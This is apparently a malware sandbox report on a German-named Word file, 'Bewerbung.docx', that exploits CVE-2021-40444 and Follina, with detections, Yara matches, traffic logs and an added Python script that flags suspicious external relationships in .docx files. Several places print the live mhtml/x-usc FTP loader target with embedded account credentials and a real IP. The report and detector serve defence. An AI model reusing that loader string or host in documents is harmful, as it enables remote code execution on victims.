Windows Analysis Report
Bewerbung.docx

Overview

General Information

Sample Name: Bewerbung.docx
Analysis ID: 705530
MD5: e7521cc41970a93d81eb7db063563474
SHA1: 668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256: d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Antivirus detection for dropped file
Contains an external reference to another file
Connects to many ports of the same IP (likely port scanning)
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP

Classification

AV Detection

Source: Bewerbung.docx Avira: detected
Source: Bewerbung.docx ReversingLabs: Detection: 20%
Source: Bewerbung.docx Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Networking

Source: global traffic TCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
Source: Joe Sandbox View ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
Source: unknown FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49173 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 434 of 6900 allowed. 220-Local time is now 09:04. Server port: 21. 220-This is a private system - No anonymous login 220 You will be disconnected after 60 seconds of inactivity.
Source: unknown TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmp
Source: dump.pcap, type: PCAP Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: Bewerbung.docx ReversingLabs: Detection: 20%
Source: Bewerbung.docx Virustotal: Detection: 9%
Source: Bewerbung.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Bewerbung.docx
Source: Bewerbung.docx OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$werbung.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmp
Source: classification engine Classification label: mal88.troj.expl.evad.winDOCX@1/17@0/1
Source: Bewerbung.docx OLE document summary: title field not present or empty
Source: Bewerbung.docx OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Bewerbung.docx Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
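The relationship target above is the loader construction the report attributes to CVE-2021-40444: an external relationship in document.xml.rels whose Target wraps an FTP URL in mhtml: and x-usc:, with the FTP account credentials sitting in the userinfo part of the URL, so Word fetches smartscreen.html from the host without any user action; that fetched HTML is what the Follina Yara rules above then match on. The following triage script is an added example, not part of the sandbox report or of any vendor tool. It unpacks a .docx, walks every .rels part and flags external relationships by relationship type, nested scheme chain and embedded credentials. It builds a constructed stand-in package in memory whose rels file carries the Target string reported above; the relationship Ids and Types, the styles entry and the other package parts are assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Wrapper/protocol schemes used by CVE-2021-40444 (mhtml:, x-usc:) and
# CVE-2022-30190 / Follina (ms-msdt:) document exploits.
SUSPICIOUS_SCHEMES = {"mhtml", "x-usc", "ms-msdt"}

# Constructed stand-in for word/_rels/document.xml.rels. The Target string is
# the one the sandbox extracted from Bewerbung.docx; the relationship Ids and
# Types and the styles entry are assumed, not taken from the sample.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
 <Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html" TargetMode="External"/>
</Relationships>
"""

_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):(.*)$", re.S)
_AUTHORITY = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://([^/\s!]+)")


def scheme_chain(target):
    """Ordered list of schemes nested in a target, e.g.
    'mhtml:ftp://h/a!x-usc:ftp://h/b' -> ['mhtml', 'ftp', 'x-usc', 'ftp'].
    MHTML targets separate the outer document and the inner part with '!'."""
    chain = []
    for segment in target.split("!"):
        rest = segment
        while True:
            m = _SCHEME.match(rest)
            if not m or len(m.group(1)) < 2:  # stop at drive letters such as C:
                break
            chain.append(m.group(1).lower())
            rest = m.group(2)
            if rest.startswith("//"):  # an authority follows: innermost URL reached
                break
    return chain


def embedded_credentials(target):
    """(user, host) for every inner URL whose authority carries userinfo."""
    found = []
    for m in _AUTHORITY.finditer(target):
        authority = m.group(1)
        if "@" in authority:
            userinfo, host = authority.rsplit("@", 1)
            found.append((userinfo.split(":", 1)[0], host))
    return found


def scan_docx(data):
    """Return one finding per external relationship that merits analyst attention."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # package-internal parts are never fetched from the network
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                chain = scheme_chain(target)
                creds = embedded_credentials(target)
                reasons = []
                # External hyperlinks need a click; any other external part
                # (oleObject, attachedTemplate, frame, ...) is loaded by Word on open.
                if rtype != "hyperlink":
                    reasons.append("external %s relationship" % rtype)
                if set(chain) & SUSPICIOUS_SCHEMES:
                    reasons.append("scheme chain %s" % " -> ".join(chain))
                if creds:
                    hosts = sorted({h for _, h in creds})
                    reasons.append("embedded credentials for %s" % ", ".join(hosts))
                if reasons:
                    findings.append({"part": name, "id": rel.get("Id"), "type": rtype,
                                     "target": target, "schemes": chain,
                                     "credentials": creds, "reasons": reasons})
    return findings


def build_sample_docx():
    """Minimal constructed .docx package carrying SAMPLE_RELS (not the real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample_docx()):
        print("%s %s (%s)" % (f["part"], f["id"], f["type"]))
        for r in f["reasons"]:
            print("  -", r)
        print("  target:", f["target"])
```

Run it against a real file with `scan_docx(open(path, "rb").read())`. Flagging every non-hyperlink external relationship is deliberately broad: legitimate documents do carry external attachedTemplate or image targets, so the scheme chain and credential findings are what separate this class of loader from an ordinary template reference, and the hosts and usernames they expose are ready-made indicators for egress and FTP log searches.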
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (identical entry reported 42 times)